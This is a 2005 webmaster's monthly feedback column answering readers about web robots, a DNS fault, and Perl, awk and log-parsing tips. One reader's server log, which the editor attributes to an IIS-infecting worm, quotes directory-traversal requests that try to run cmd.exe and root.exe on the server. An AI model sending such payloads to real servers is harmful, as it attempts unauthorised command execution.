Feedback and Hints, January 2005
This month features a new layout and a blog. Also the previous month's feedback column has been been formatted with the new layout.Feedback:
- Message from iman
- CGI postgres/perl script
- Sqworm -- what is it?
- Re: Sqworm -- what is it?
- Just Testing
- PGTS website
- PGTS website (2)
- MSNbot from 207.46.98.35
- Linknzbot
- PGTS website (3)
- "bad file" error in coldarch script
- New Robot LimeBot
- Getting file types from log file
Hints for this month:
Message from iman
From: ssss@nodomain Date: Sat, 1 Jan 2005 11:18:03 +1100 (EST) Dear Webmaster, -- Message Follows -- thanks i have a picture sex -- Message Ends -- From: 80.191.11.17 Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; FunWebProducts) Ed: Well I'm glad to hear that one of our readers is happy! Enjoy your pictures, where ever you got them from ... Just be careful you don't go blind! Well he might be happy, but possibly a little confused. Since we don't offer such pictures at this website ... Perhaps he intended this message for someone else? Iman (if that is his name) sent this message from a netblock that is owned by Alborz Computer Co., in Tehran. His browser also has the FunWebProducts add-in, which according to most MS pundits is spyware. He might be getting more than he bargained for ... (Oh what a tangled web we weave ...)
Using awk in vi (again)
Date: Sat, 15 Jan 2005 01:07:33 +1100 From: Gerry Patterson Ed: Recently I started a blog The first entry contained a rather lengthy programming tip. And then I thought it would be better to put it here (rather than in the blog). I was using vi (as I do most of the time when I am writing an email or just about any document). I wanted to include a list of agents that had visited the PGTS web site, and had the word 'Tiscali' in them. So I used the following SQL to fetch a list of these in last_visit order: cust=> select agent_id,name,last_visit coalesce(ip_addr,'-') from webagents where agent_string like '%Tiscal%' or agent_string like '%tiscal%' and robot_ind = 0 order by last_visit; That SQL produces a report consisting of four columns seperated with a '|' character. This can easily be turned into a bunch of URLs with an awk one-liner ... The URLs point to the PGTS agent_string database. Here is what the output looked like: agent_id | name | last_visit | coalesce ----------+---------+------------------------+------------------- 1892 | MSIE | 2002-10-02 00:12:18+10 | - 3912 | MSIE | 2003-01-19 20:21:33+11 | - 5119 | MSIE | 2003-03-17 02:25:37+11 | - 6604 | MSIE | 2003-05-12 21:50:35+10 | - 6780 | MSIE | 2003-05-19 06:51:31+10 | - 13479 | MSIE | 2004-02-03 09:51:46+11 | 81.131.120.3/32 14380 | MSIE | 2004-02-14 08:21:40+11 | 205.188.209.71/32 14355 | MSIE | 2004-02-14 15:46:20+11 | 195.93.34.10/32 14347 | MSIE | 2004-02-15 21:22:12+11 | 62.252.0.4/32 16726 | MSIE | 2004-03-15 10:25:49+11 | 82.3.65.27 16901 | MSIE | 2004-04-07 03:42:42+10 | 82.84.196.145 20300 | Tiscali | 2004-06-06 20:45:30+10 | 80.46.188.101 21189 | MSIE | 2004-07-09 07:07:12+10 | 81.152.109.248 23415 | MSIE | 2004-11-01 09:14:17+11 | 193.60.159.61 24192 | MSIE | 2004-12-07 20:15:21+11 | 196.30.113.163 1450 | MSIE | 2004-12-08 02:07:34+11 | 62.11.130.225 3844 | MSIE | 2004-12-13 07:20:37+11 | 81.26.104.195 (17 rows) I then cut and pasted the output from the SQL into the vi session, that I was running using the following command: !}!awk '{print "<a href=|http://www.pgts.com.au/cgi-bin/psql?w0302=" $1 "|>" $3,$5,$NF "</a>"}' (The first two keystrokes are the movement command ... and the script in single quotes is an awk one-liner). Then this was followed by this substitute command: :.,.+16s/|/"/g (which changes the '|' character into '"') Which created the following text: <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=1892">MSIE 2002-10-02 -</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=3912">MSIE 2003-01-19 -</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=5119">MSIE 2003-03-17 -</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=6604">MSIE 2003-05-12 -</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=6780">MSIE 2003-05-19 -</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=13479">MSIE 2004-02-03 81.131.120.3/32</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=14380">MSIE 2004-02-14 205.188.209.71/32</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=14355">MSIE 2004-02-14 195.93.34.10/32</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=14347">MSIE 2004-02-15 62.252.0.4/32</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=16726">MSIE 2004-03-15 82.3.65.27</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=16901">MSIE 2004-04-07 82.84.196.145</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=20300">Tiscali 2004-06-06 80.46.188.101</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=21189">MSIE 2004-07-09 81.152.109.248</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=23415">MSIE 2004-11-01 193.60.159.61</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=24192">MSIE 2004-12-07 196.30.113.163</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=1450">MSIE 2004-12-08 62.11.130.225</a> <a href="http://www.pgts.com.au/cgi-bin/psql?w0302=3844">MSIE 2004-12-13 81.26.104.195</a> (Try it yourself ... Go back and cut the report out and then enter the commands into vi)
CGI postgres/perl script
From: Sudheer Date: Sat, 15 Jan 2005 17:08:08 +1100 (EST) Dear Webmaster, -- Message Follows -- how to connect my postgres database to perl? i have used the following script in my perl program. #!/usr/bin/perl use CGI qw(:standard); use DBI; use strict; use CGI::Carp qw/fatalsToBrowser/; $query = new CGI; print $query->header; # my $dbname = 'test'; # Connect to database # my $conn = Pg::connectdb("dbname=$dbname"); # if ($conn->status != PGRES_CONNECTION_OK) { # die "ERR: Couldn't open connection: ".$conn->errorMessage."\n"; #} $dbh = DBI->connect("dbi:Pg:dbname=test", "postgres", "", {AutoCommit => 1, Rais eError => 1}); print $query->start_html("FIREWALL"); print "<center><H1>FIREWALL</H1></center>\n"; &print_prompt($query); &do_work($query); &print_tail; $dbh->disconnect; print $query->end_html sub print_prompt { my($query) = @_; print $query->start_multipart_form; print "<BR>IP Adress:"; print $query->popup_menu(-name=>'IP Adress', -Values=>['10.0.0.1','10.0.0.2','10.0.0.3','10.0.0.4',1 0.0.0.5,10.0.0.6], ); print "Source IP Adress:"; print $query->textfield('numeric'); print "Destination IP Adress:</BR>"; print $query->textfield('Dest'); print $query->radio_group(-name=>'Disable Enable', -Values=>['Disable','Enable'], ); print "<P><center>",$query->submit('Action','save'); print $query->submit('Action','cancel'); print $query->endform; } -- Message Ends -- From: 202.153.35.138 Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20040206
Sqworm -- what is it?
Date: Tue, 18 Jan 2005 11:39:49 +1100 From: Jeremy Hill Ed: The following message was sent from the PGTS Postmaster for update of the robots file. Dear Webmaster, --------------- Name:Sqworm Version:2.9.85 Email: Comments: 'what is Sqworm? it was poking around my server.' URL: --------------- Ed: I replied as follows: G'day, Not really sure what Sqworm is. When did you see it? The last time I saw it was 2004-08-04 00:16:37 GMT The netblock 66.194.6/24 is currently owned by Websense (delegated by Time Warner Telecom) This is all I can discover about them: OrgName: Websense OrgID: WEBSEN-1 Address: 10240 Sorrento Valley Rd City: San Diego StateProv: CA PostalCode: 92121 Country: US NetRange: 66.194.6.0 - 66.194.6.255 CIDR: 66.194.6.0/24 NetName: TWTC-NETBLK-4 NetHandle: NET-66-194-6-0-1 Parent: NET-66-192-0-0-1 NetType: Reassigned RegDate: 2004-01-26 Updated: 2004-01-26 As far as I can tell, the agent they dispatched is a robot. It didn't read robots.txt. It is not aggressive and does not appear impolite. There have been far more hits to my site from people searching for information about Sqworm, than there has been from Sqworm. I find nothing suspicious about this organisation or their robot (except the name, which is a bit peculiar) Cheers, Gerry Patterson For more information see: below.
Re: Sqworm -- what is it?
From: Jeremy Hill Date: Tue, 18 Jan 2005 04:13:35 GMT Ed: Jeremy replied as follows: Gerry, I am new to web hosting. I set up an Abyss server on my pc 3 days ago, and am just learning to look over my logs. Here is an excerpt from my log file when Sqworm showed up. Directly after that hit I had some unidentified hits poking around looking for scripts and executables. This is somewhat disturbing to me. ------------- 66.194.6.4 - - [16/Jan/2005:08:37:31 -0600] "GET / HTTP/1.0" 200 9961 "" "Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)" 68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 223 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 223 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" "" 68.44.229.242 - - [16/Jan/2005:09:45:09 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" "" ----------- I don't know if the 2 IPs are related. I traced the Sqworm IP (using the 'Tracert' tool at www.DNSstuff.com) to a record for "Office of the Future", apparently last registered in 1992. The IP goes to a UNIX server {core-02-so-0-0-0-0.phnx.twtelecom.net.}, where it appears there is a firewall blocking the 'Tracert' tool. The other IP goes to a Microsoft server on Comcast {pcp0010510861pcs.limstn01.de.comcast.net.} As I said before I don't know if these two entries are related, but they appear in my log exactly as recorded above. Hopefully this is useful information. Thanks, Jeremy Hill Ed: Jeremy, It is unlikely that these entries are related. The hits from 68.44.229.242 are from a worm which infects only IIS servers. I believe it may be a variant of nimbda. For more information about the worm see below. Sqworm, despite the name, is actually a robot. On my site it behaves like a robot. It appears that someone else sent some feedback about sqworm here. Unfortunately, at the time I was neglecting my website. So ... my apologies to Martha. I have since done some research on Sqworm and investigated Websense. It appears that the robot Sqworm, is rigididge (that's Australian for ok). The netblock is owned by Websense as previously noted. Websense are a medium to large US corporation who sell Webfiltering software for proxy servers. They claim to be able to categorise websites. This robot must be part of their categorisation. They probably use it to build their website database. The name "worm" has come into considerable disrepute. And this no doubt accounts for the general sense of unease that surrounds the Sqworm robot. It is nevertheless, unfounded. Sqworm is only guilty of being christened with what, at best, could be described as "an unfortunate choice of name". Also I believe that Websense could do a better job of explaining what their robot does and how their categories work. The whole enterprise seems too secretive. If anyone knows different, please let me know. There is more information about Sqworm in the PGTS blog. Nimbda: The second IP address that was in Jeremy's email was from a real worm. This netblock is owned by Comcast Cable Communications, Inc. Cherry Hill NJ, a large US cable company. The nethandle is NET-68-44-0-0-1, CIDR 68.44.0.0/15 Someone is running an IIS server on one of Comcast's addresses and it has been infected. This IP address returns 7 positives from the openRBL. So their Internet experience is likely to be somewhat diminished. They probably don't know any better. Blars has listed them ... He's a cruel man. Cruel but fair.
Just Testing
From: Anonymous Date: Wed, 19 Jan 2005 11:24:26 +1100 (EST) Ed: I received the following notification from the PGTS postmaster: Dear Webmaster, My agent string is: Interwebthingy Exploder 8.0000001 (standards compatible; W3C 4.01; [en-GB]) My IP address is: 217.44.1.8 --------------- Name:unknown Version: Comments: This is a fake string I entered because I felt like it. And because it helps me analysing my own logfiles because I can filter my own visits. Owner: OS: Ed: I use a combination of agent_string and ip address. That way webmaster hits do not get counted in any stats. BTW: Coming soon ... An updated version of the agent_string information panels that will enable readers to add their own comments.
PGTS website
From: Stephen Hampson Date: Wed, 19 Jan 2005 13:06:14 +1100 Hi Gerry, I'm not sure if you are aware, but a lot of the time when I try to reach your website it is unavailable. The DNS seems to not resolve. I get: "Ping request could not find host www.pgts.com.au/ Please check the name and try again." When I try to ping your hostname. Thanks Steve Ed: I thought that this might be a network problem, upstream, since I have accessed my website many times in the Melbourne metropolitan area, without any obvious problems. It turned out that this was a network problem, and the problem was my network! More below ...
PGTS website (2)
Date: Thu, 20 Jan 2005 13:14:19 +1100 From: Stephen Hampson Gerry, I'm not sure what you are looking for with the ping's but I'll forward them to you? As I said be before the DNS server on 203.213.17.10 is either not running or is unreachable. If you log into that box and run: Dig @127.0.0.1 www.pgts.com.au What is the output? Thanks Steve Ed: Unfortunately I did not read Steve's email carefully. I checked my primary DNS, saw that it was working (of course) ... But he was asking about my secondary DNS! He was away the next day, and did not get my email, till Monday ... Fortunately he persisted ... and in one of those awful (dohhh!) moments, I realised that my seconday DNS was not running! I had altered some of the startup scripts and restarted the server when I upgraded to postgres 7.4.5. Deep embarassment here! I started named. (see Steve's next email here)
MSNbot from 207.46.98.35
From: Chemzoo Date: Thu, 20 Jan 2005 17:51:25 +1100 (EST) Dear Webmaster, Previous Values --------------- Name:Msnbot Version:0.3 Email: Comments: I got ip address of msnbot as 207.46.98.35, which is not listed Ed: Chemzoo, the address 207.46.98.35 belongs to Microsoft Corp, as does the MSNbot
Linknzbot
From: "Dave" Date: Sun, 23 Jan 2005 14:10:31 +1300 > ----- Original Message ----- > From: "PGTS Webmaster" <webmaster@pgts.com.au> > To: <webmaster@linknz.co.nz> > Sent: Sunday, January 23, 2005 12:10 PM > Subject: Link With PGTS.com.au Hi and thanks for listing my search engine on your web site, I have just sent in my web spidering robot (linknzbot) to index your web site into the search engine it reported the following searchable links from your web site: links found : 17 http://www.pgts.com.au/ http://www.pgts.com.au/page01.html http://www.pgts.com.au/page02.html http://www.pgts.com.au/page03.html http://www.pgts.com.au/download/ http://www.pgts.com.au/page04.php http://www.pgts.com.au/pgtsj/ http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0412 http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0211a http://www.pgts.com.au/pgtsj/0501.html http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204 http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204a http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204b http://www.pgts.com.au/cgi-bin/psql?feedback http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0309b http://www.pgts.com.au/cgi-bin/psql?blog http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0302a Optimizing tables... Indexing complete ! People who use the linknz search engine can now find and visit your web site. Many regards Dave Andrews P.S. you should find a new USER AGENT STRING in your log files for the linknzbot which is our web spidering robot, written in C++. Ed: G'day Dave, Thanks for your feedback. I started the Robots Collections a couple of years ago, as a sort of hobby, because I was looking for things to write about, when I started publishing articles online. It has turned out to be a very popular topic with webmasters. And for that reason, I am trying to categorise Bots when I see them. I have now settled on the following categories (not mutually exclusive). Aggressive Hard-hitting Impolite Suspicious The default category is blank, this implies that the Bot is polite, obeys robots.txt instructions, does not attempt to cloak or disguise its' behaviour, and is not associated with criminal activities or spamming (which these days looks increasingly as if it will also be considered criminal). Over the next couple of months, I will be updating the collection to reflect these categories. I almost classified your Bot as Hard-hitting. 366 hits in 12 minutes is sort of borderline. However, since they were mostly HEADs rather than GETs, I just made a note in the comments section. Might I suggest that if you intend to do make your crawl sessions any longer, you should introduce a delay. Regards, Gerry Patterson SysAdmin PGTS Pty Ltd
PGTS website (3)
Date: Mon, 24 Jan 2005 10:13:57 +1100 From: "Stephen Hampson" Yeah. no worries. That was what I was trying to tell you. It looks like windows DNS does not fail over properly. So if it hits the secondary DNS server (50% chance because it work in a round robin way), then there is a fair chance it will never try the primary DNS server and will just fail. Just tried your site then and it works. It wasn't working about 30 mins ago due to this issue. I'll let you know if I experience problems again. Ed: And I am very grateful that Steve persisted ... despite me being so relentlessly thick-headed! Of course it helps if named is running on your DNS server! I hadn't realised that Windows DNS servers worked that way ... Obviously I am going to have to fix up those startup scripts. And all those other people with Windows DNS, you may find that my site works more than 50% of the time now!
"bad file" error in coldarch script
From: Grant September Date: Mon, 24 Jan 2005 22:31:08 +1100 (EST) Dear Webmaster, -- Message Follows -- Hi There, tried to use your coldarch.pl file on NT, but kept on getting Bad file error, i think this is due to my path have a space in the name do you have a workaround for this as i have no perl programming skills Ed: I'm sorry Grant, but I have not allowed for spaces in data_file names.
New Robot LimeBot
From: Kenn Sippell Date: Tue, 25 Jan 2005 05:08:31 +1100 (EST) Dear Webmaster, -- Message Follows -- I would like you to be aware of the web robot known as LimeBot - written as part of the free enterprise initiative Cruise Lime. The bot identifies itself with the User-Agent: 'LimeBot/1.0 (+www.cruiselime.com/LimeBot.php)'. I would appreciate it if you included it in your databases for the convenience of those who use your search. -- Message Ends -- Ed: I replied as follows ... Kenn, The agent_strings are added automatically when visitors come to this site. If you are part of the Cruise Lime Enterprise, then I suggest you send the Limebot to my site. It will be included within 24 hours. I will approve the entry when I see it. The LimeBot was first seen in the PGTS logs at 2005-01-25 11:12 GMT.
Getting file types from log file
From: Khoa Nguyen Date: Fri, 28 Jan 2005 12:31:08 +1100 (EST) Dear Webmaster, -- Message Follows -- Hi, thanks for the info posted on the site. They are useful for better understanding of the log file. On the web page, you print out 4 columns: IP, Date, Time, and Target. I have trouble separating the file name from the file type. Example, for the Target part, what if I only want to print out the types of file request (txt, html, ..) instead of the whole file name (data.html)? What if I only want to count how many hits each file type has, instead of how many times the file is requested? When searching through the log file, I could search for the file request, but couldn't search for file type? I have something like: "/\/[\w\d\-\.]+\s/" Please advise. Much appreciate it. Thanks Ed: Khoa, Sorry not to answer this sooner. I have been trying to find time to re-write some of the scripts, and I was hoping to come up with a script that answers this. Unfortunately I did not get around to doing it. I do have a script (which is hooked into the PGTS database ... And the way I try to determine the type is by examining the file extensions. Obviously this will be site dependant. However, you could come up with a general solution which uses standard MIME types. The script I have is actually rather complex. It examines each IP address and looks for "Robot" behaviour. e.g. suppose we have a subroutine called parse log which splits each line into its' individual components then ($IP,$htime,$cmd,$status,$bytes,$referer,$agent) = parse_log($_); # this assigns the components # then we can test for the MIME types unless ($page){ $page_type = $NULL; } elsif ($page =~ /\.jpg$/ || $page =~ /\.gif$/ ){ $page_type = $IMAGE; } elsif ($page =~ /\.exe$/ || $page =~ /\.gz$/ || $page =~ /\.msi$/ || $page =~ /\.zip$/){ $page_type = $BIN; } elsif ($page =~ /robots.txt$/ ){ $page_type = $ROBOT; } elsif ($page =~ /\.txt$/ || $page =~ /-HOWTO$/ ){ $page_type = $TXT; } etc ... etc This is rather cumbersome, but it allows you to tailor the results for your site (you may have particular standards, you may only use gif, jpg and png or you may do as I do and put all images in the same folder in which case you would test the first part of $page to see if it was in the folder called /image etc etc. Hope this helps